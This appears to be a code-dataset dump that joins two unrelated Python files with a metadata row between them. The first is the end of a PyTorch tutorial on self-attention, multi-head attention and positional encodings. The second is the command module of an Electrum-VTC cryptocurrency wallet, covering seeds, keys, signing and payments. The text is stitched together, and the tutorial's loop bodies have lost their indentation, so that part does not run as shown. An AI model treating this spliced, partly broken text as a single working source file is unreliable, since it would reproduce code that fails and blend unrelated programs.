omega_mat = embedded_sentence.matmul(embedded_sentence.T)
torch.allclose(omega_mat, omega)
# - Next, let's compute the attention weights by normalizing the "omega" values so they sum to 1
#
# $$\alpha_{i j}=\frac{\exp \left(\omega_{i j}\right)}{\sum_{j=1}^{T} \exp \left(\omega_{i j}\right)}=\operatorname{softmax}\left(\left[\omega_{i j}\right]_{j=1 \ldots T}\right)$$
#
# $$\sum_{j=1}^{T} \alpha_{i j}=1$$
attention_weights = F.softmax(omega, dim=1)
attention_weights.shape
# - We can confirm that the attention weights in each row sum up to one:
attention_weights.sum(dim=1)
# - Now that we have the attention weights, we can compute the context vectors $\boldsymbol{z}^{(i)}=\sum_{j=1}^{T} \alpha_{i j} \boldsymbol{x}^{(j)}$
# - For instance, to compute the context-vector of the 2nd input element (the element at index 1), we can perform the following computation:
x_2 = embedded_sentence[1, :]
context_vec_2 = torch.zeros(x_2.shape)
for j in range(8):
x_j = embedded_sentence[j, :]
context_vec_2 += attention_weights[1, j] * x_j
context_vec_2
# - Or, more efficiently, using linear algebra and matrix multiplication:
context_vectors = torch.matmul(
attention_weights, embedded_sentence)
torch.allclose(context_vec_2, context_vectors[1])
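# - To summarize the steps above, the whole basic self-attention operation
#   can be wrapped into one small helper. (This function is our own
#   illustration and not part of the original example.)
def basic_self_attention(X):
    # X: (sequence_length, embedding_dim); illustrative helper only
    omega = X.matmul(X.T)              # pairwise dot-product scores
    alpha = F.softmax(omega, dim=1)    # attention weights; each row sums to 1
    return alpha.matmul(X)             # context vectors
torch.allclose(basic_self_attention(embedded_sentence), context_vectors)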
# ### Parameterizing the self-attention mechanism: scaled dot-product attention
torch.manual_seed(123)
d = embedded_sentence.shape[1]
U_query = torch.rand(d, d)
U_key = torch.rand(d, d)
U_value = torch.rand(d, d)
x_2 = embedded_sentence[1]
query_2 = U_query.matmul(x_2)
key_2 = U_key.matmul(x_2)
value_2 = U_value.matmul(x_2)
keys = U_key.matmul(embedded_sentence.T).T
torch.allclose(key_2, keys[1])
values = U_value.matmul(embedded_sentence.T).T
torch.allclose(value_2, values[1])
omega_23 = query_2.dot(keys[2])
omega_23
omega_2 = query_2.matmul(keys.T)
omega_2
attention_weights_2 = F.softmax(omega_2 / d**0.5, dim=0)
attention_weights_2
# - (For reference, the equivalent loop-based computation, left commented out:)
#context_vector_2nd = torch.zeros(values[1, :].shape)
#for j in range(8):
#    context_vector_2nd += attention_weights_2[j] * values[j, :]
#context_vector_2nd
context_vector_2 = attention_weights_2.matmul(values)
context_vector_2
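# - As a generalization of the single-query computation above, the context
#   vectors for all eight inputs can be computed at once. (This sketch and
#   its variable names are our own addition; it only reuses the tensors
#   defined earlier.)
queries = U_query.matmul(embedded_sentence.T).T            # (8, 16)
all_omega = queries.matmul(keys.T)                         # (8, 8) score matrix
all_attention_weights = F.softmax(all_omega / d**0.5, dim=1)
all_context_vectors = all_attention_weights.matmul(values)
torch.allclose(all_context_vectors[1], context_vector_2)   # matches the 2nd input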
# ## Attention is all we need: introducing the original transformer architecture
# ### Encoding context embeddings via multi-head attention
torch.manual_seed(123)
d = embedded_sentence.shape[1]
one_U_query = torch.rand(d, d)
h = 8
multihead_U_query = torch.rand(h, d, d)
multihead_U_key = torch.rand(h, d, d)
multihead_U_value = torch.rand(h, d, d)
multihead_query_2 = multihead_U_query.matmul(x_2)
multihead_query_2.shape
multihead_key_2 = multihead_U_key.matmul(x_2)
multihead_value_2 = multihead_U_value.matmul(x_2)
multihead_key_2[2]
stacked_inputs = embedded_sentence.T.repeat(8, 1, 1)
stacked_inputs.shape
multihead_keys = torch.bmm(multihead_U_key, stacked_inputs)
multihead_keys.shape
multihead_keys = multihead_keys.permute(0, 2, 1)
multihead_keys.shape
multihead_keys[2, 1] # index: [3rd attention head (index 2), 2nd key (index 1)]
multihead_values = torch.matmul(multihead_U_value, stacked_inputs)
multihead_values = multihead_values.permute(0, 2, 1)
multihead_z_2 = torch.rand(8, 16)  # random placeholder for the eight 16-dim head outputs
linear = torch.nn.Linear(8*16, 16)
context_vector_2 = linear(multihead_z_2.flatten())
context_vector_2.shape
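# - For completeness, here is a sketch of how the actual head outputs could
#   be computed from the tensors defined above, instead of using the random
#   multihead_z_2 placeholder. (This sketch and its variable names are our
#   own addition.)
multihead_omega_2 = torch.einsum(
    'hd,hjd->hj', multihead_query_2, multihead_keys)       # (heads, keys)
multihead_attn_2 = F.softmax(multihead_omega_2 / d**0.5, dim=1)
multihead_z_2_actual = torch.einsum(
    'hj,hjd->hd', multihead_attn_2, multihead_values)      # (heads, d)
context_vector_2_actual = linear(multihead_z_2_actual.flatten())
context_vector_2_actual.shape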
# ### Learning a language model: decoder and masked multi-head attention
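# - A minimal sketch of the causal-masking idea covered in this subsection,
#   reusing the unscaled score matrix omega_mat from earlier. (Our own
#   illustration: position i may only attend to positions j <= i, so all
#   scores with j > i are set to -inf before the softmax.)
T = embedded_sentence.shape[0]
causal_mask = torch.triu(torch.ones(T, T, dtype=torch.bool), diagonal=1)
masked_scores = omega_mat.masked_fill(causal_mask, float('-inf'))
masked_attention = F.softmax(masked_scores / d**0.5, dim=1)
masked_attention[0]  # the first position can only attend to itself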
# ### Implementation details: positional encodings and layer normalization
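# - A minimal sketch of the sinusoidal positional encoding from the original
#   transformer paper, followed by layer normalization. (Our own
#   illustration; this section of the book discusses both only conceptually.)
def sinusoidal_positional_encoding(seq_len, d_model):
    # illustrative helper, not part of the original script
    position = torch.arange(seq_len, dtype=torch.float32).unsqueeze(1)
    div_term = torch.exp(
        torch.arange(0, d_model, 2, dtype=torch.float32)
        * (-torch.log(torch.tensor(10000.0)) / d_model))
    pe = torch.zeros(seq_len, d_model)
    pe[:, 0::2] = torch.sin(position * div_term)   # even dimensions
    pe[:, 1::2] = torch.cos(position * div_term)   # odd dimensions
    return pe
pos_encoded = embedded_sentence + sinusoidal_positional_encoding(8, 16)
layer_norm = torch.nn.LayerNorm(16)
layer_norm(pos_encoded).shape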
# ---
#
# Readers may ignore the next cell.
| 19.74734
| 198
| 0.724444
|
1c49318bff6d5183bcc5c2c6c25c9a5820e01828
| 35,956
|
py
|
Python
|
lib/commands.py
|
Bryangoodson/electrum-vtc-tor
|
8e80ee8aff59fc62db93646ba980b37a2ed81e38
|
[
"MIT"
] | 1
|
2021-04-04T20:40:29.000Z
|
2021-04-04T20:40:29.000Z
|
lib/commands.py
|
Bryangoodson/electrum-vtc-tor
|
8e80ee8aff59fc62db93646ba980b37a2ed81e38
|
[
"MIT"
] | null | null | null |
lib/commands.py
|
Bryangoodson/electrum-vtc-tor
|
8e80ee8aff59fc62db93646ba980b37a2ed81e38
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import datetime
import time
import copy
import argparse
import json
import ast
import base64
from functools import wraps
from decimal import Decimal
import util
from util import print_msg, format_satoshis, print_stderr
import bitcoin
from bitcoin import is_address, hash_160, COIN, TYPE_ADDRESS
import transaction
from transaction import Transaction
import paymentrequest
from paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
import contacts
known_commands = {}
def satoshis(amount):
# satoshi conversion must not be performed by the parser
return int(COIN*Decimal(amount)) if amount not in ['!', None] else amount
class Command:
    def __init__(self, func, s):
        # s is a string of flags: 'n' = requires network,
        # 'w' = requires wallet, 'p' = requires password
        self.name = func.__name__
        self.requires_network = 'n' in s
        self.requires_wallet = 'w' in s
        self.requires_password = 'p' in s
self.description = func.__doc__
self.help = self.description.split('.')[0] if self.description else None
varnames = func.func_code.co_varnames[1:func.func_code.co_argcount]
self.defaults = func.func_defaults
if self.defaults:
n = len(self.defaults)
self.params = list(varnames[:-n])
self.options = list(varnames[-n:])
else:
self.params = list(varnames)
self.options = []
self.defaults = []
def command(s):
def decorator(func):
global known_commands
name = func.__name__
known_commands[name] = Command(func, s)
@wraps(func)
def func_wrapper(*args, **kwargs):
c = known_commands[func.__name__]
if c.requires_wallet and args[0].wallet is None:
raise BaseException("wallet not loaded. Use 'electrum-ltc daemon load_wallet'")
return func(*args, **kwargs)
return func_wrapper
return decorator
class Commands:
def __init__(self, config, wallet, network, callback = None):
self.config = config
self.wallet = wallet
self.network = network
self._callback = callback
def _run(self, method, args, password_getter):
# this wrapper is called from the python console
cmd = known_commands[method]
if cmd.requires_password and self.wallet.has_password():
password = password_getter()
if password is None:
return
else:
password = None
f = getattr(self, method)
if cmd.requires_password:
result = f(*args, **{'password':password})
else:
result = f(*args)
if self._callback:
self._callback()
return result
@command('')
def commands(self):
"""List of commands"""
return ' '.join(sorted(known_commands.keys()))
@command('')
def create(self):
"""Create a new wallet"""
raise BaseException('Not a JSON-RPC command')
@command('wn')
def restore(self, text):
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of Vertcoin addresses
or Vertcoin private keys. If you want to be prompted for your
seed, type '?' or ':' (concealed) """
raise BaseException('Not a JSON-RPC command')
@command('wp')
def password(self, password=None, new_password=None):
"""Change wallet password. """
self.wallet.update_password(password, new_password)
self.wallet.storage.write()
return {'password':self.wallet.has_password()}
@command('')
def getconfig(self, key):
"""Return a configuration variable. """
return self.config.get(key)
@command('')
def setconfig(self, key, value):
"""Set a configuration variable. 'value' may be a string or a Python expression."""
try:
value = ast.literal_eval(value)
except:
pass
self.config.set_key(key, value)
return True
@command('')
def make_seed(self, nbits=132, entropy=1, language=None):
"""Create a seed"""
from mnemonic import Mnemonic
s = Mnemonic(language).make_seed('standard', nbits, custom_entropy=entropy)
return s.encode('utf8')
@command('')
def check_seed(self, seed, entropy=1, language=None):
"""Check that a seed was generated with given entropy"""
from mnemonic import Mnemonic
return Mnemonic(language).check_seed(seed, entropy)
@command('n')
def getaddresshistory(self, address):
"""Return the transaction history of any address. Note: This is a
walletless server query, results are not checked by SPV.
"""
return self.network.synchronous_get(('blockchain.address.get_history', [address]))
@command('w')
def listunspent(self):
"""List unspent outputs. Returns the list of unspent transaction
outputs in your wallet."""
l = copy.deepcopy(self.wallet.get_utxos(exclude_frozen=False))
for i in l:
v = i["value"]
i["value"] = float(v)/COIN if v is not None else None
return l
@command('n')
def getaddressunspent(self, address):
"""Returns the UTXO list of any address. Note: This
is a walletless server query, results are not checked by SPV.
"""
return self.network.synchronous_get(('blockchain.address.listunspent', [address]))
@command('n')
def getutxoaddress(self, txid, pos):
"""Get the address of a UTXO. Note: This is a walletless server query, results are
not checked by SPV.
"""
r = self.network.synchronous_get(('blockchain.utxo.get_address', [txid, pos]))
return {'address': r}
@command('')
def serialize(self, jsontx):
"""Create a transaction from json inputs.
Inputs must have a redeemPubkey.
Outputs must be a list of {'address':address, 'value':satoshi_amount}.
"""
keypairs = {}
inputs = jsontx.get('inputs')
outputs = jsontx.get('outputs')
locktime = jsontx.get('locktime', 0)
for txin in inputs:
if txin.get('output'):
prevout_hash, prevout_n = txin['output'].split(':')
txin['prevout_n'] = int(prevout_n)
txin['prevout_hash'] = prevout_hash
if txin.get('redeemPubkey'):
pubkey = txin['redeemPubkey']
txin['type'] = 'p2pkh'
txin['x_pubkeys'] = [pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
if txin.get('privkey'):
keypairs[pubkey] = txin['privkey']
elif txin.get('redeemScript'):
raise BaseException('Not implemented')
outputs = map(lambda x: (TYPE_ADDRESS, x['address'], int(x['value'])), outputs)
tx = Transaction.from_io(inputs, outputs, locktime=locktime)
tx.sign(keypairs)
return tx.as_dict()
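    # A hypothetical input for serialize() above, with placeholder values
    # (the field names match the keys this method reads; real txid, pubkey,
    # and private-key strings are elided):
    #
    # {"inputs": [{"output": "<txid>:0",
    #              "redeemPubkey": "<hex public key>",
    #              "privkey": "<private key>"}],
    #  "outputs": [{"address": "<address>", "value": 100000}],
    #  "locktime": 0}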
@command('wp')
def signtransaction(self, tx, privkey=None, password=None):
"""Sign a transaction. The wallet keys will be used unless a private key is provided."""
tx = Transaction(tx)
if privkey:
pubkey = bitcoin.public_key_from_private_key(privkey)
h160 = bitcoin.hash_160(pubkey.decode('hex'))
x_pubkey = 'fd' + (chr(0) + h160).encode('hex')
tx.sign({x_pubkey:privkey})
else:
self.wallet.sign_transaction(tx, password)
return tx.as_dict()
@command('')
def deserialize(self, tx):
"""Deserialize a serialized transaction"""
tx = Transaction(tx)
return tx.deserialize()
@command('n')
def broadcast(self, tx, timeout=30):
"""Broadcast a transaction to the network. """
tx = Transaction(tx)
return self.network.broadcast(tx, timeout)
@command('')
def createmultisig(self, num, pubkeys):
"""Create multisig address"""
assert isinstance(pubkeys, list), (type(num), type(pubkeys))
redeem_script = transaction.multisig_script(pubkeys, num)
address = bitcoin.hash160_to_p2sh(hash_160(redeem_script.decode('hex')))
return {'address':address, 'redeemScript':redeem_script}
@command('w')
def freeze(self, address):
"""Freeze address. Freeze the funds at one of your wallet\'s addresses"""
return self.wallet.set_frozen_state([address], True)
@command('w')
def unfreeze(self, address):
"""Unfreeze address. Unfreeze the funds at one of your wallet\'s address"""
return self.wallet.set_frozen_state([address], False)
@command('wp')
def getprivatekeys(self, address, password=None):
"""Get private keys of addresses. You may pass a single wallet address, or a list of wallet addresses."""
if is_address(address):
return self.wallet.get_private_key(address, password)
domain = address
return [self.wallet.get_private_key(address, password) for address in domain]
@command('w')
def ismine(self, address):
"""Check if address is in wallet. Return true if and only address is in wallet"""
return self.wallet.is_mine(address)
@command('')
def dumpprivkeys(self):
"""Deprecated."""
return "This command is deprecated. Use a pipe instead: 'electrum-vtc listaddresses | electrum-vtc getprivatekeys - '"
@command('')
def validateaddress(self, address):
"""Check that an address is valid. """
return is_address(address)
@command('w')
def getpubkeys(self, address):
"""Return the public keys for a wallet address. """
return self.wallet.get_public_keys(address)
@command('w')
def getbalance(self):
"""Return the balance of your wallet. """
c, u, x = self.wallet.get_balance()
out = {"confirmed": str(Decimal(c)/COIN)}
if u:
out["unconfirmed"] = str(Decimal(u)/COIN)
if x:
out["unmatured"] = str(Decimal(x)/COIN)
return out
@command('n')
def getaddressbalance(self, address):
"""Return the balance of any address. Note: This is a walletless
server query, results are not checked by SPV.
"""
out = self.network.synchronous_get(('blockchain.address.get_balance', [address]))
out["confirmed"] = str(Decimal(out["confirmed"])/COIN)
out["unconfirmed"] = str(Decimal(out["unconfirmed"])/COIN)
return out
@command('n')
def getproof(self, address):
"""Get Merkle branch of an address in the UTXO set"""
p = self.network.synchronous_get(('blockchain.address.get_proof', [address]))
out = []
for i,s in p:
out.append(i)
return out
@command('n')
def getmerkle(self, txid, height):
"""Get Merkle branch of a transaction included in a block. Electrum
uses this to verify transactions (Simple Payment Verification)."""
return self.network.synchronous_get(('blockchain.transaction.get_merkle', [txid, int(height)]))
@command('n')
def getservers(self):
"""Return the list of available servers"""
return self.network.get_servers()
@command('')
def version(self):
"""Return the version of electrum."""
from version import ELECTRUM_VERSION
return ELECTRUM_VERSION
@command('w')
def getmpk(self):
"""Get master public key. Return your wallet\'s master public key"""
return self.wallet.get_master_public_key()
@command('wp')
def getmasterprivate(self, password=None):
"""Get master private key. Return your wallet\'s master private key"""
return str(self.wallet.keystore.get_master_private_key(password))
@command('wp')
def getseed(self, password=None):
"""Get seed phrase. Print the generation seed of your wallet."""
s = self.wallet.get_seed(password)
return s.encode('utf8')
@command('wp')
def importprivkey(self, privkey, password=None):
"""Import a private key. """
if not self.wallet.can_import_privkey():
return "Error: This type of wallet cannot import private keys. Try to create a new wallet with that key."
try:
addr = self.wallet.import_key(privkey, password)
out = "Keypair imported: " + addr
except BaseException as e:
out = "Error: " + str(e)
return out
def _resolver(self, x):
if x is None:
return None
out = self.wallet.contacts.resolve(x)
if out.get('type') == 'openalias' and self.nocheck is False and out.get('validated') is False:
raise BaseException('cannot verify alias', x)
return out['address']
@command('nw')
def sweep(self, privkey, destination, tx_fee=None, nocheck=False, imax=100):
"""Sweep private keys. Returns a transaction that spends UTXOs from
privkey to a destination address. The transaction is not
broadcasted."""
tx_fee = satoshis(tx_fee)
privkeys = privkey if type(privkey) is list else [privkey]
self.nocheck = nocheck
dest = self._resolver(destination)
tx = self.wallet.sweep(privkeys, self.network, self.config, dest, tx_fee, imax)
return tx.as_dict() if tx else None
@command('wp')
def signmessage(self, address, message, password=None):
"""Sign a message with a key. Use quotes if your message contains
whitespaces"""
sig = self.wallet.sign_message(address, message, password)
return base64.b64encode(sig)
@command('')
def verifymessage(self, address, signature, message):
"""Verify a signature."""
sig = base64.b64decode(signature)
return bitcoin.verify_message(address, sig, message)
def _mktx(self, outputs, fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime=None):
self.nocheck = nocheck
change_addr = self._resolver(change_addr)
domain = None if domain is None else map(self._resolver, domain)
final_outputs = []
for address, amount in outputs:
address = self._resolver(address)
amount = satoshis(amount)
final_outputs.append((TYPE_ADDRESS, address, amount))
coins = self.wallet.get_spendable_coins(domain, self.config)
tx = self.wallet.make_unsigned_transaction(coins, final_outputs, self.config, fee, change_addr)
        if locktime is not None:
tx.locktime = locktime
if rbf:
tx.set_rbf(True)
if not unsigned:
self.wallet.sign_transaction(tx, password)
return tx
@command('wp')
def payto(self, destination, amount, tx_fee=None, from_addr=None, change_addr=None, nocheck=False, unsigned=False, rbf=False, password=None, locktime=None):
"""Create a transaction. """
tx_fee = satoshis(tx_fee)
domain = [from_addr] if from_addr else None
tx = self._mktx([(destination, amount)], tx_fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime)
return tx.as_dict()
@command('wp')
def paytomany(self, outputs, tx_fee=None, from_addr=None, change_addr=None, nocheck=False, unsigned=False, rbf=False, password=None, locktime=None):
"""Create a multi-output transaction. """
tx_fee = satoshis(tx_fee)
domain = [from_addr] if from_addr else None
tx = self._mktx(outputs, tx_fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime)
return tx.as_dict()
@command('w')
def history(self):
"""Wallet history. Returns the transaction history of your wallet."""
balance = 0
out = []
for item in self.wallet.get_history():
tx_hash, height, conf, timestamp, value, balance = item
if timestamp:
date = datetime.datetime.fromtimestamp(timestamp).isoformat(' ')[:-3]
else:
date = "----"
label = self.wallet.get_label(tx_hash)
tx = self.wallet.transactions.get(tx_hash)
tx.deserialize()
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
                if addr is None: continue
if addr == "(pubkey)":
prevout_hash = x.get('prevout_hash')
prevout_n = x.get('prevout_n')
_addr = self.wallet.find_pay_to_pubkey_address(prevout_hash, prevout_n)
if _addr:
addr = _addr
input_addresses.append(addr)
for addr, v in tx.get_outputs():
output_addresses.append(addr)
out.append({
'txid': tx_hash,
'timestamp': timestamp,
'date': date,
'input_addresses': input_addresses,
'output_addresses': output_addresses,
'label': label,
'value': float(value)/COIN if value is not None else None,
'height': height,
'confirmations': conf
})
return out
@command('w')
def setlabel(self, key, label):
"""Assign a label to an item. Item may be a Vertcoin address or a
transaction ID"""
self.wallet.set_label(key, label)
@command('w')
def listcontacts(self):
"""Show your list of contacts"""
return self.wallet.contacts
@command('w')
def getalias(self, key):
"""Retrieve alias. Lookup in your list of contacts, and for an OpenAlias DNS record."""
return self.wallet.contacts.resolve(key)
@command('w')
def searchcontacts(self, query):
"""Search through contacts, return matching entries. """
results = {}
for key, value in self.wallet.contacts.items():
if query.lower() in key.lower():
results[key] = value
return results
@command('w')
def listaddresses(self, receiving=False, change=False, show_labels=False, frozen=False, unused=False, funded=False, show_balance=False):
"""List wallet addresses. Returns the list of all addresses in your wallet. Use optional arguments to filter the results."""
out = []
for addr in self.wallet.get_addresses():
if frozen and not self.wallet.is_frozen(addr):
continue
if receiving and self.wallet.is_change(addr):
continue
if change and not self.wallet.is_change(addr):
continue
if unused and self.wallet.is_used(addr):
continue
if funded and self.wallet.is_empty(addr):
continue
item = addr
if show_balance:
item += ", "+ format_satoshis(sum(self.wallet.get_addr_balance(addr)))
if show_labels:
item += ', ' + repr(self.wallet.labels.get(addr, ''))
out.append(item)
return out
@command('n')
def gettransaction(self, txid):
"""Retrieve a transaction. """
if self.wallet and txid in self.wallet.transactions:
tx = self.wallet.transactions[txid]
else:
raw = self.network.synchronous_get(('blockchain.transaction.get', [txid]))
if raw:
tx = Transaction(raw)
else:
raise BaseException("Unknown transaction")
return tx.as_dict()
@command('')
def encrypt(self, pubkey, message):
"""Encrypt a message with a public key. Use quotes if the message contains whitespaces."""
return bitcoin.encrypt_message(message, pubkey)
@command('wp')
def decrypt(self, pubkey, encrypted, password=None):
"""Decrypt a message encrypted with a public key."""
return self.wallet.decrypt_message(pubkey, encrypted, password)
def _format_request(self, out):
pr_str = {
PR_UNKNOWN: 'Unknown',
PR_UNPAID: 'Pending',
PR_PAID: 'Paid',
PR_EXPIRED: 'Expired',
}
        out['amount (VTC)'] = format_satoshis(out.get('amount'))
out['status'] = pr_str[out.get('status', PR_UNKNOWN)]
return out
@command('w')
def getrequest(self, key):
"""Return a payment request"""
r = self.wallet.get_payment_request(key, self.config)
if not r:
raise BaseException("Request not found")
return self._format_request(r)
#@command('w')
#def ackrequest(self, serialized):
# """<Not implemented>"""
# pass
@command('w')
def listrequests(self, pending=False, expired=False, paid=False):
"""List the payment requests you made."""
out = self.wallet.get_sorted_requests(self.config)
if pending:
f = PR_UNPAID
elif expired:
f = PR_EXPIRED
elif paid:
f = PR_PAID
else:
f = None
if f is not None:
out = filter(lambda x: x.get('status')==f, out)
return map(self._format_request, out)
@command('w')
    def getunusedaddress(self, force=False):
"""Returns the first unused address."""
addr = self.wallet.get_unused_address()
if addr is None and force:
addr = self.wallet.create_new_address(False)
if addr:
return addr
else:
return False
@command('w')
def addrequest(self, amount, memo='', expiration=None, force=False):
"""Create a payment request."""
addr = self.wallet.get_unused_address()
if addr is None:
if force:
addr = self.wallet.create_new_address(False)
else:
return False
amount = satoshis(amount)
expiration = int(expiration) if expiration else None
req = self.wallet.make_payment_request(addr, amount, memo, expiration)
self.wallet.add_payment_request(req, self.config)
out = self.wallet.get_payment_request(addr, self.config)
return self._format_request(out)
@command('wp')
def signrequest(self, address, password=None):
"Sign payment request with an OpenAlias"
alias = self.config.get('alias')
if not alias:
raise BaseException('No alias in your configuration')
alias_addr = self.wallet.contacts.resolve(alias)['address']
self.wallet.sign_payment_request(address, alias, alias_addr, password)
@command('w')
def rmrequest(self, address):
"""Remove a payment request"""
return self.wallet.remove_payment_request(address, self.config)
@command('w')
def clearrequests(self):
"""Remove all payment requests"""
for k in self.wallet.receive_requests.keys():
self.wallet.remove_payment_request(k, self.config)
@command('n')
def notify(self, address, URL):
"""Watch an address. Everytime the address changes, a http POST is sent to the URL."""
def callback(x):
import urllib2
headers = {'content-type':'application/json'}
data = {'address':address, 'status':x.get('result')}
try:
req = urllib2.Request(URL, json.dumps(data), headers)
response_stream = urllib2.urlopen(req, timeout=5)
util.print_error('Got Response for %s' % address)
except BaseException as e:
util.print_error(str(e))
self.network.send([('blockchain.address.subscribe', [address])], callback)
return True
@command('wn')
def is_synchronized(self):
""" return wallet synchronization status """
return self.wallet.is_up_to_date()
@command('')
def help(self):
# for the python console
return sorted(known_commands.keys())
param_descriptions = {
'privkey': 'Private key. Type \'?\' to get a prompt.',
'destination': 'Vertcoin address, contact or alias',
'address': 'Vertcoin address',
'seed': 'Seed phrase',
'txid': 'Transaction ID',
'pos': 'Position',
'height': 'Block height',
'tx': 'Serialized transaction (hexadecimal)',
'key': 'Variable name',
'pubkey': 'Public key',
'message': 'Clear text message. Use quotes if it contains spaces.',
'encrypted': 'Encrypted message',
'amount': 'Amount to be sent (in VTC). Type \'!\' to send the maximum available.',
'requested_amount': 'Requested amount (in VTC).',
'outputs': 'list of ["address", amount]',
}
command_options = {
'password': ("-W", "--password", "Password"),
'new_password':(None, "--new_password","New Password"),
'receiving': (None, "--receiving", "Show only receiving addresses"),
'change': (None, "--change", "Show only change addresses"),
'frozen': (None, "--frozen", "Show only frozen addresses"),
'unused': (None, "--unused", "Show only unused addresses"),
'funded': (None, "--funded", "Show only funded addresses"),
'show_balance':("-b", "--balance", "Show the balances of listed addresses"),
'show_labels': ("-l", "--labels", "Show the labels of listed addresses"),
'nocheck': (None, "--nocheck", "Do not verify aliases"),
'imax': (None, "--imax", "Maximum number of inputs"),
    'tx_fee': ("-f", "--fee", "Transaction fee (in VTC)"),
'from_addr': ("-F", "--from", "Source address. If it isn't in the wallet, it will ask for the private key unless supplied in the format public_key:private_key. It's not saved in the wallet."),
'change_addr': ("-c", "--change", "Change address. Default is a spare address, or the source address if it's not in the wallet"),
'nbits': (None, "--nbits", "Number of bits of entropy"),
'entropy': (None, "--entropy", "Custom entropy"),
'language': ("-L", "--lang", "Default language for wordlist"),
'gap_limit': ("-G", "--gap", "Gap limit"),
'privkey': (None, "--privkey", "Private key. Set to '?' to get a prompt."),
'unsigned': ("-u", "--unsigned", "Do not sign transaction"),
'rbf': (None, "--rbf", "Replace-by-fee transaction"),
'locktime': (None, "--locktime", "Set locktime block number"),
'domain': ("-D", "--domain", "List of addresses"),
'memo': ("-m", "--memo", "Description of the request"),
'expiration': (None, "--expiration", "Time in seconds"),
'timeout': (None, "--timeout", "Timeout in seconds"),
'force': (None, "--force", "Create new address beyond gap limit, if no more addresses are available."),
'pending': (None, "--pending", "Show only pending requests."),
'expired': (None, "--expired", "Show only expired requests."),
'paid': (None, "--paid", "Show only paid requests."),
}
# don't use floats because of rounding errors
from transaction import tx_from_str
json_loads = lambda x: json.loads(x, parse_float=lambda x: str(Decimal(x)))
arg_types = {
'num': int,
'nbits': int,
'imax': int,
'entropy': long,
'tx': tx_from_str,
'pubkeys': json_loads,
'jsontx': json_loads,
'inputs': json_loads,
'outputs': json_loads,
'tx_fee': lambda x: str(Decimal(x)) if x is not None else None,
'amount': lambda x: str(Decimal(x)) if x != '!' else '!',
'locktime': int,
}
config_variables = {
'addrequest': {
'requests_dir': 'directory where a bip70 file will be written.',
'ssl_privkey': 'Path to your SSL private key, needed to sign the request.',
'ssl_chain': 'Chain of SSL certificates, needed for signed requests. Put your certificate at the top and the root CA at the end',
'url_rewrite': 'Parameters passed to str.replace(), in order to create the r= part of vertcoin: URIs. Example: \"(\'file:///var/www/\',\'https://electrum-ltc.org/\')\"',
},
'listrequests':{
'url_rewrite': 'Parameters passed to str.replace(), in order to create the r= part of vertcoin: URIs. Example: \"(\'file:///var/www/\',\'https://electrum-ltc.org/\')\"',
}
}
def set_default_subparser(self, name, args=None):
"""see http://stackoverflow.com/questions/5176691/argparse-how-to-specify-a-default-subcommand"""
subparser_found = False
for arg in sys.argv[1:]:
if arg in ['-h', '--help']: # global help if no subparser
break
else:
for x in self._subparsers._actions:
if not isinstance(x, argparse._SubParsersAction):
continue
for sp_name in x._name_parser_map.keys():
if sp_name in sys.argv[1:]:
subparser_found = True
if not subparser_found:
# insert default in first position, this implies no
# global options without a sub_parsers specified
if args is None:
sys.argv.insert(1, name)
else:
args.insert(0, name)
argparse.ArgumentParser.set_default_subparser = set_default_subparser
# workaround https://bugs.python.org/issue23058
# see https://github.com/nickstenning/honcho/pull/121
def subparser_call(self, parser, namespace, values, option_string=None):
    from argparse import ArgumentError, SUPPRESS, _UNRECOGNIZED_ARGS_ATTR
    from gettext import gettext as _  # _ is needed for the error message below
parser_name = values[0]
arg_strings = values[1:]
# set the parser name if requested
if self.dest is not SUPPRESS:
setattr(namespace, self.dest, parser_name)
# select the parser
try:
parser = self._name_parser_map[parser_name]
except KeyError:
tup = parser_name, ', '.join(self._name_parser_map)
msg = _('unknown parser %r (choices: %s)') % tup
raise ArgumentError(self, msg)
# parse all the remaining options into the namespace
# store any unrecognized options on the object, so that the top
# level parser can decide what to do with them
namespace, arg_strings = parser.parse_known_args(arg_strings, namespace)
if arg_strings:
vars(namespace).setdefault(_UNRECOGNIZED_ARGS_ATTR, [])
getattr(namespace, _UNRECOGNIZED_ARGS_ATTR).extend(arg_strings)
argparse._SubParsersAction.__call__ = subparser_call
def add_network_options(parser):
parser.add_argument("-1", "--oneserver", action="store_true", dest="oneserver", default=False, help="connect to one server only")
parser.add_argument("-s", "--server", dest="server", default=None, help="set server host:port:protocol, where protocol is either t (tcp) or s (ssl)")
parser.add_argument("-p", "--proxy", dest="proxy", default=None, help="set proxy [type:]host[:port], where type is socks4,socks5 or http")
def add_global_options(parser):
group = parser.add_argument_group('global options')
group.add_argument("-v", "--verbose", action="store_true", dest="verbose", default=False, help="Show debugging information")
group.add_argument("-D", "--dir", dest="electrum_path", help="electrum directory")
group.add_argument("-P", "--portable", action="store_true", dest="portable", default=False, help="Use local 'electrum-vtc_data' directory")
group.add_argument("-w", "--wallet", dest="wallet_path", help="wallet path")
group.add_argument("--testnet", action="store_true", dest="testnet", default=False, help="Use Testnet")
